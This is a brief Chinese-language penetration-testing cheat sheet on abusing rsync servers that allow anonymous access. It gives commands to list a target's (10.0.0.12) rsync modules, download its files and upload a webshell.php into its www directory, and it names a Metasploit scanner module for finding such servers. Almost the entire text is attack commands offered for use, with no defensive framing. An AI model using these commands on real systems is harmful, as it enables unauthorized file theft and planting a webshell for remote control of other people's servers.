rsync可能泄露敏感文件
常用操作
列举整个同步目录或指定目录:
Default
rsync 10.0.0.12::
rsync 10.0.0.12::www/
下载文件或目录到本地:
Default
rsync -avz 10.0.0.12::www/test.php /root
rsync -avz 10.0.0.12::www/ /var/tmp
上传本地文件到服务端:
Default
rsync -avz webshell.php 10.0.0.12::www/
Metasploit中关于允许匿名访问的rsync扫描模块:auxiliary/scanner/rsync/modules_list